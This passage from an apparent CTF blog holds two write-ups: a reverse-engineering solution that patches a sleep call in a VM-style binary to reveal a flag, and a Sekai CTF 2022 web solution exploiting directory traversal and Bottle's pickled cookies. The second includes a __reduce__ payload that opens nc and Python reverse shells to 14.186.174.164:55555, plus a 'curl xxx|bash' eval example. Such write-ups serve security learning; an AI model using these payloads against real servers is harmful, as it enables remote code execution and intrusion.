 v26 = *(_DWORD *)(a1[2] + 4 * a1[4]--);
 v2 = sub_401110(v26, v22);
 v16 = a1[4] + 1;
 a1[4] = v16;
 *(_DWORD *)(a1[2] + 4 * v16) = v2;
 break;
 case 2:
 ... snip
 case 4:
 ... snip
 case 5:
 ... snip
 case 6:
 ... snip
 case 7:
 ... snip
 case 8:
 ... snip
 case 9:
 ... snip
 case 10:
 ... snip
 case 11:
 ... snip
 case 12:
 ... snip
 case 13:
 ... snip
 case 14:
 v38 = *(_DWORD *)(a1[2] + 4 * a1[4]--);
 sub_401040("RESULT: %d\n", v38);
 sub_401260(v38);
 break;
 case 15:
 ... snip
 case 16:
 ... snip
 case 17:
 ... snip
 case 18:
 ... snip
 default:
 continue;
 }
 }
}

It is easy to observe that only case 1 and case 14 involve calling other functions.

To be more precise, if the program reaches case 1, the function sub_401110(v26, v22) will be called, and on the other hand, if the program reaches case 14, the function sub_401260(v38) will be called. We will talk more about these two functions in the next parts of this blog.

Reaching case 14

As stated earlier, the function sub_401260(v38) will be called if the program reaches case 14, which will be the last part of our code flow.

int __cdecl sub_401260(char a1)
{
 char v2[256]; // [esp+10h] [ebp-224h] BYREF
 char Buffer; // [esp+110h] [ebp-124h] BYREF
 _BYTE v4[3]; // [esp+111h] [ebp-123h] BYREF
 char v5[32]; // [esp+210h] [ebp-24h] BYREF

 qmemcpy(v5, "Áõ", 2);
 v5[2] = -77;
 v5[3] = 26;
 ... snip
 v5[28] = -66;
 v5[29] = 63;
 memset(v2, 0, sizeof(v2));
 sub_401D50(&Buffer, "%d", 55 * a1);
 sub_401160(v5, v2, 30, &Buffer, &v4[strlen(&Buffer)] - v4);
 return sub_401040("flag is: %s", (char)v2);
}

The function receives our modified variable Block, then uses it to produce our flag.

Reaching case 1

Here is where things get interesting. Take a look at the function sub_401110(v26, v22), we can conclude that this is why our program runs slowly. The fact that it makes our program sleeps plus it is possibly called many times throughout the process makes our executable runs without any output for a very long time.

int __cdecl sub_401110(int a1, int a2)
{
 int v3; // [esp+0h] [ebp-4h]

 v3 = sub_4010F0(0);
 Sleep(1000 * a1);
 Sleep(1000 * a2);
 return sub_4010F0(0) - v3;
}

The algorithm here is very simple, however this is author’s idea to let the program sleeps for a total of (a1 + a2) seconds each time this function is called. The intended result of this function is to return a1 + a2. We will have to patch the binary to get our flag.

Patch the binary

So we know what makes our program runs slowly, it is time to fix that. Below is the decompiled assembly code of that part.

mov ecx, [ebp+arg_0]
mov edx, [ecx+10h]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+10h], edx
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_C]
push edx
call sub_401110
add esp, 8
mov [ebp+var_58], eax
mov eax, [ebp+arg_0]

Instead of calling sub_401110, we should patch the program to directly calculates ecx + edx then assigns it into eax. We find out that the opcode of call sub_401110 is E8 77 FC FF FF.

Using IDA Pro integrated settings, which can be found at Options > Generals > Number of Opcode bytes (non-graph) set to a large enough number, we can view each instruction’s opcode.

With pwntools library, we also find out the opcode for add ecx, edx and move eax, ecx is 01 D1 and 89 C8 using this script written in Python below.

from pwn import *
context.arch = 'amd64'
print(asm('add ecx, edx'))
print(asm('mov eax, ecx'))

It is now time to patch the binary. Use any hex editor of your choice to patch the binary, here I use IDA Pro’s integrated hex view to patch the binary.

Change E8 77 FC FF FF to 01 D1 89 C8 90 using any hex editor of your choice (here 90 corresponds to the NOP instruction).

Result

After patching the binary, run it again to get our flag.

fazect@LAPTOP-CQA118DI:/mnt/d/Downloads$ ./slow.exe
RESULT: 75025
flag is: Pr4ct1c3_VMc0d3_w1th_F1b0n4cc1

Wrap the flag with ISITDTU{}, we have our flag for the challenge: ISITDTU{Pr4ct1c3_VMc0d3_w1th_F1b0n4cc1}.

Sekai CTF 2022 Bottle Poem

Thu, 12 Jan 2023 00:00:00 +0000

ctf

writeup

web-exploitation

Table of Contents

Problem statement

Author hints that flag is executable

The website is vulnerable to directory traversal

Pick /etc/self/procline to get the start application command

So the application source is located at /app/app.py

from bottle import route, run, template, request, response, error
from config.secret import sekai
import os
import re


@route("/")
def home():
 return template("index")


@route("/show")
def index():
 response.content_type = "text/plain; charset=UTF-8"
 param = request.query.id
 if re.search("^../app", param):
 return "No!!!!"
 requested_path = os.path.join(os.getcwd() + "/poems", param)
 try:
 with open(requested_path) as f:
 tfile = f.read()
 except Exception as e:
 return "No This Poems"
 return tfile


@error(404)
def error404(error):
 return template("error")


@route("/sign")
def index():
 try:
 session = request.get_cookie("name", secret=sekai)
 if not session or session["name"] == "guest":
 session = {"name": "guest"}
 response.set_cookie("name", session, secret=sekai)
 return template("guest", name=session["name"])
 if session["name"] == "admin":
 return template("admin", name=session["name"])
 except:
 return "pls no hax"


if __name__ == "__main__":
 os.chdir(os.path.dirname(__file__))
 run(host="0.0.0.0", port=8080)

If run the code at local change the set_cookie’s session argument to {”name”:”admin”} will get the admin page but it just a trap

The hint said flag is executable, meaning RCE is possible.

Basic

Let’s have a look at Python Bottle

Python Bottle

Bottle first:

pickle.dumps([name, value], -1) then base64 encode → encoded
hmac encrypt the secret seperately then base64 encode → signature
add ‘!’ at the first char and ‘?’ in between signature

Cookie format: !secret_hmac_base64==?pickle_name_value_base64==

get_cookie:

…
base64 decode the pickled then call pickle.loads(pickle.dumps([’name’, “Pickle dumps containing RCE here”], -1))

We have controlled the value input through cookie

Pickle exploit

Ref Byte-stream created by pickle.dumps contains opcodes that are then one-by-one executed as soon as we load the pickle back in. If you are curious how the instructions in this pickle look like, you can use pickletools to create a disassembly: pickletools.dis(pickled)

>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3])
>>> import pickletools
>>> pickletools.dis(pickled)
 0: \x80 PROTO 4
 2: \x95 FRAME 25
 11: ] EMPTY_LIST
 12: \x94 MEMOIZE (as 0)
 13: ( MARK
 14: \x8c SHORT_BINUNICODE 'pickle'
 22: \x94 MEMOIZE (as 1)
 23: \x8c SHORT_BINUNICODE 'me'
 27: \x94 MEMOIZE (as 2)
 28: K BININT1 1
 30: K BININT1 2
 32: K BININT1 3
 34: e APPENDS (MARK at 13)
 35: . STOP

pickle still allows you to define a custom behavior for the pickling process for your class instances.

The __reduce__() method takes no argument and shall return either a string or
preferably a tuple (the returned object is often referred to as the “reduce value”).
[…] When a tuple is returned, it must be between two and six items long.
Optional items can either be omitted, or None can be provided as their value.
The semantics of each item are in order:

A callable object that will be called to create the initial version of the object.
A tuple of arguments for the callable object. An empty tuple must be given if the
callable does not accept any argument. […]

So by implementing __reduce__ in a class which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this for getting our own reverse shell code executed.

So if any value in the array pass into pickle.dumps is an instance containing __reduce__(…) function, that reduce will be executed when calling pickle.loads(…). And the __reduce__(…) implement demand returns an tuple with first value an executable, callable method in python for example (os.system, eval or any function), the second value is argument of the callable.

So by implement reduce method that return (eval, ('__import__("os").popen("curl xxx|bash")',)) , we can execute code on the server.

The exercise step

Add an class definition with __reduce__ method (that return reverse shell python code) to create an instance, then pass the instance to the session1[’name’] that passed into set_cookie.

class RCE:
 def __reduce__(self):
 # 14.186.174.164
 cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 14.186.174.164 55555 > /tmp/f')
 return os.system, ((f"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("14.186.174.164",55555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""),)

# Test
@route("/sign")
def index():
 session = request.get_cookie("name", secret=sekai)
 print(session["name"])
 if not session or session["name"] == "guest":
 objWithReduce = RCE()
 session = {"name": "guest"}
 session1 = {"name": objWithReduce}
 response.set_cookie("name", session1, secret=sekai)
 return template("guest", name=session["name"])
 if session["name"] == "admin":
 return template("admin", name=session["name"])